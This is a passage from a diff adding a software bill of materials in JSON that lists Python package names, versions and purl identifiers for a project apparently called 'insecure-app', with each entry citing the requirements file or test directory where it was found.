"pkg:pypi/secretstorage@3.3.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "pkce", + "version": "1.0.3", + "purl": "pkg:pypi/pkce@1.0.3", + "type": "library", + "bom-ref": "pkg:pypi/pkce@1.0.3", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "pydantic", + "version": "1.10.8", + "purl": "pkg:pypi/pydantic@1.10.8", + "type": "library", + "bom-ref": "pkg:pypi/pydantic@1.10.8", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "PyJWT", + "version": "2.4.0", + "purl": "pkg:pypi/pyjwt@2.4.0", + "type": "library", + "bom-ref": "pkg:pypi/pyjwt@2.4.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "python-dotenv", + "version": "0.21.0", + "purl": "pkg:pypi/python-dotenv@0.21.0", + "type": "library", + "bom-ref": "pkg:pypi/python-dotenv@0.21.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "anaconda-navigator", + "version": "latest", + "purl": "pkg:pypi/anaconda-navigator@latest", + "type": "library", + "bom-ref": "pkg:pypi/anaconda-navigator@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "anaconda-project", + "version": "latest", + "purl": "pkg:pypi/anaconda-project@latest", + "type": "library", + "bom-ref": "pkg:pypi/anaconda-project@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "anaconda-client", + "version": "1.12.1", + "purl": "pkg:pypi/anaconda-client@1.12.1", + "type": "library", + "bom-ref": "pkg:pypi/anaconda-client@1.12.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "clyent", + "version": "1.2.2", + "purl": "pkg:pypi/clyent@1.2.2", + "type": "library", + "bom-ref": "pkg:pypi/clyent@1.2.2", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "defusedxml", + "version": "0.7.1", + "purl": "pkg:pypi/defusedxml@0.7.1", + "type": "library", + "bom-ref": "pkg:pypi/defusedxml@0.7.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "nbformat", + "version": "5.9.2", + "purl": "pkg:pypi/nbformat@5.9.2", + "type": "library", + "bom-ref": "pkg:pypi/nbformat@5.9.2", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "fastjsonschema", + "version": "2.16.2", + "purl": "pkg:pypi/fastjsonschema@2.16.2", + "type": "library", + "bom-ref": "pkg:pypi/fastjsonschema@2.16.2", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "jsonschema", + "version": "4.17.3", + "purl": "pkg:pypi/jsonschema@4.17.3", + "type": "library", + "bom-ref": "pkg:pypi/jsonschema@4.17.3", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "jupyter-core", + "version": "5.3.0", + "purl": "pkg:pypi/jupyter-core@5.3.0", + "type": "library", + "bom-ref": "pkg:pypi/jupyter-core@5.3.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "platformdirs", + "version": "3.10.0", + "purl": "pkg:pypi/platformdirs@3.10.0", + "type": "library", + "bom-ref": "pkg:pypi/platformdirs@3.10.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "traitlets", + "version": "5.7.1", + "purl": "pkg:pypi/traitlets@5.7.1", + "type": "library", + "bom-ref": "pkg:pypi/traitlets@5.7.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "conda-pack", + "version": "0.6.0", + "purl": "pkg:pypi/conda-pack@0.6.0", + "type": "library", + "bom-ref": "pkg:pypi/conda-pack@0.6.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "anyio", + "version": "latest", + "purl": "pkg:pypi/anyio@latest", + "type": "library", + "bom-ref": "pkg:pypi/anyio@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "argon2-cffi", + "version": "latest", + "purl": "pkg:pypi/argon2-cffi@latest", + "type": "library", + "bom-ref": "pkg:pypi/argon2-cffi@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "argon2-cffi-bindings", + "version": "latest", + "purl": "pkg:pypi/argon2-cffi-bindings@latest", + "type": "library", + "bom-ref": "pkg:pypi/argon2-cffi-bindings@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "arrow", + "version": "latest", + "purl": "pkg:pypi/arrow@latest", + "type": "library", + "bom-ref": "pkg:pypi/arrow@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "astroid", + "version": "latest", + "purl": "pkg:pypi/astroid@latest", + "type": "library", + "bom-ref": "pkg:pypi/astroid@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "astropy", + "version": "latest", + "purl": "pkg:pypi/astropy@latest", + "type": "library", + "bom-ref": "pkg:pypi/astropy@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "asttokens", + "version": "latest", + "purl": "pkg:pypi/asttokens@latest", + "type": "library", + "bom-ref": "pkg:pypi/asttokens@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "async-timeout", + "version": "latest", + "purl": "pkg:pypi/async-timeout@latest", + "type": "library", + "bom-ref": "pkg:pypi/async-timeout@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "atomicwrites", + "version": "1.4.0", + "purl": "pkg:pypi/atomicwrites@1.4.0", + "type": "library", + "bom-ref": "pkg:pypi/atomicwrites@1.4.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "autopep8", + "version": "latest", + "purl": "pkg:pypi/autopep8@latest", + "type": "library", + "bom-ref": "pkg:pypi/autopep8@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "backcall", + "version": "latest", + "purl": "pkg:pypi/backcall@latest", + "type": "library", + "bom-ref": "pkg:pypi/backcall@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "backports.functools-lru-cache", + "version": "latest", + "purl": "pkg:pypi/backports.functools-lru-cache@latest", + "type": "library", + "bom-ref": "pkg:pypi/backports.functools-lru-cache@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "backports.tempfile", + "version": "latest", + "purl": "pkg:pypi/backports.tempfile@latest", + "type": "library", + "bom-ref": "pkg:pypi/backports.tempfile@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "backports.weakref", + "version": "1.0.post1", + "purl": "pkg:pypi/backports.weakref@1.0.post1", + "type": "library", + "bom-ref": "pkg:pypi/backports.weakref@1.0.post1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "bcrypt", + "version": "latest", + "purl": "pkg:pypi/bcrypt@latest", + "type": "library", + "bom-ref": "pkg:pypi/bcrypt@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "beautifulsoup4", + "version": "latest", + "purl": "pkg:pypi/beautifulsoup4@latest", + "type": "library", + "bom-ref": "pkg:pypi/beautifulsoup4@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "binaryornot", + "version": "latest", + "purl": "pkg:pypi/binaryornot@latest", + "type": "library", + "bom-ref": "pkg:pypi/binaryornot@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "black", + "version": "latest", + "purl": "pkg:pypi/black@latest", + "type": "library", + "bom-ref": "pkg:pypi/black@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "bleach", + "version": "latest", + "purl": "pkg:pypi/bleach@latest", + "type": "library", + "bom-ref": "pkg:pypi/bleach@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "blinker", + "version": "1.8.2", + "purl": "pkg:pypi/blinker@1.8.2", + "type": "library", + "bom-ref": "pkg:pypi/blinker@1.8.2", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "bokeh", + "version": "latest", + "purl": "pkg:pypi/bokeh@latest", + "type": "library", + "bom-ref": "pkg:pypi/bokeh@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "boltons", + "version": "latest", + "purl": "pkg:pypi/boltons@latest", + "type": "library", + "bom-ref": "pkg:pypi/boltons@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "brotlipy", + "version": "0.7.0", + "purl": "pkg:pypi/brotlipy@0.7.0", + "type": "library", + "bom-ref": "pkg:pypi/brotlipy@0.7.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "certifi", + "version": "latest", + "purl": "pkg:pypi/certifi@latest", + "type": "library", + "bom-ref": "pkg:pypi/certifi@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "cffi", + "version": "latest", + "purl": "pkg:pypi/cffi@latest", + "type": "library", + "bom-ref": "pkg:pypi/cffi@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "charset-normalizer", + "version": "latest", + "purl": "pkg:pypi/charset-normalizer@latest", + "type": "library", + "bom-ref": "pkg:pypi/charset-normalizer@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "cloudpickle", + "version": "latest", + "purl": "pkg:pypi/cloudpickle@latest", + "type": "library", + "bom-ref": "pkg:pypi/cloudpickle@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "colorama", + "version": "latest", + "purl": "pkg:pypi/colorama@latest", + "type": "library", + "bom-ref": "pkg:pypi/colorama@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "colorcet", + "version": "latest", + "purl": "pkg:pypi/colorcet@latest", + "type": "library", + "bom-ref": "pkg:pypi/colorcet@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "comm", + "version": "latest", + "purl": "pkg:pypi/comm@latest", + "type": "library", + "bom-ref": "pkg:pypi/comm@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "conda-build", + "version": "latest", + "purl": "pkg:pypi/conda-build@latest", + "type": "library", + "bom-ref": "pkg:pypi/conda-build@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "conda-content-trust", + "version": "latest", + "purl": "pkg:pypi/conda-content-trust@latest", + "type": "library", + "bom-ref": "pkg:pypi/conda-content-trust@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "conda-index", + "version": "latest", + "purl": "pkg:pypi/conda-index@latest", + "type": "library", + "bom-ref": "pkg:pypi/conda-index@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "conda-libmamba-solver", + "version": "latest", + "purl": "pkg:pypi/conda-libmamba-solver@latest", + "type": "library", + "bom-ref": "pkg:pypi/conda-libmamba-solver@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "conda-package-streaming", + "version": "latest", + "purl": "pkg:pypi/conda-package-streaming@latest", + "type": "library", + "bom-ref": "pkg:pypi/conda-package-streaming@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "conda-repo-cli", + "version": "1.0.75", + "purl": "pkg:pypi/conda-repo-cli@1.0.75", + "type": "library", + "bom-ref": "pkg:pypi/conda-repo-cli@1.0.75", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "conda-token", + "version": "latest", + "purl": "pkg:pypi/conda-token@latest", + "type": "library", + "bom-ref": "pkg:pypi/conda-token@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "conda-verify", + "version": "3.4.2", + "purl": "pkg:pypi/conda-verify@3.4.2", + "type": "library", + "bom-ref": "pkg:pypi/conda-verify@3.4.2", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "contourpy", + "version": "latest", + "purl": "pkg:pypi/contourpy@latest", + "type": "library", + "bom-ref": "pkg:pypi/contourpy@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "cookiecutter", + "version": "latest", + "purl": "pkg:pypi/cookiecutter@latest", + "type": "library", + "bom-ref": "pkg:pypi/cookiecutter@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "cycler", + "version": "latest", + "purl": "pkg:pypi/cycler@latest", + "type": "library", + "bom-ref": "pkg:pypi/cycler@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "cytoolz", + "version": "latest", + "purl": "pkg:pypi/cytoolz@latest", + "type": "library", + "bom-ref": "pkg:pypi/cytoolz@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "daal4py", + "version": "2023.1.1", + "purl": "pkg:pypi/daal4py@2023.1.1", + "type": "library", + "bom-ref": "pkg:pypi/daal4py@2023.1.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "dask", + "version": "latest", + "purl": "pkg:pypi/dask@latest", + "type": "library", + "bom-ref": "pkg:pypi/dask@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "datasets", + "version": "latest", + "purl": "pkg:pypi/datasets@latest", + "type": "library", + "bom-ref": "pkg:pypi/datasets@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "datashader", + "version": "latest", + "purl": "pkg:pypi/datashader@latest", + "type": "library", + "bom-ref": "pkg:pypi/datashader@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "datashape", + "version": "0.5.4", + "purl": "pkg:pypi/datashape@0.5.4", + "type": "library", + "bom-ref": "pkg:pypi/datashape@0.5.4", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "debugpy", + "version": "latest", + "purl": "pkg:pypi/debugpy@latest", + "type": "library", + "bom-ref": "pkg:pypi/debugpy@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "decorator", + "version": "latest", + "purl": "pkg:pypi/decorator@latest", + "type": "library", + "bom-ref": "pkg:pypi/decorator@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "diff-match-patch", + "version": "latest", + "purl": "pkg:pypi/diff-match-patch@latest", + "type": "library", + "bom-ref": "pkg:pypi/diff-match-patch@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "dill", + "version": "latest", + "purl": "pkg:pypi/dill@latest", + "type": "library", + "bom-ref": "pkg:pypi/dill@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "distributed", + "version": "latest", + "purl": "pkg:pypi/distributed@latest", + "type": "library", + "bom-ref": "pkg:pypi/distributed@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "docstring-to-markdown", + "version": "latest", + "purl": "pkg:pypi/docstring-to-markdown@latest", + "type": "library", + "bom-ref": "pkg:pypi/docstring-to-markdown@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "entrypoints", + "version": "latest", + "purl": "pkg:pypi/entrypoints@latest", + "type": "library", + "bom-ref": "pkg:pypi/entrypoints@latest", + "evidence": { + "identity": 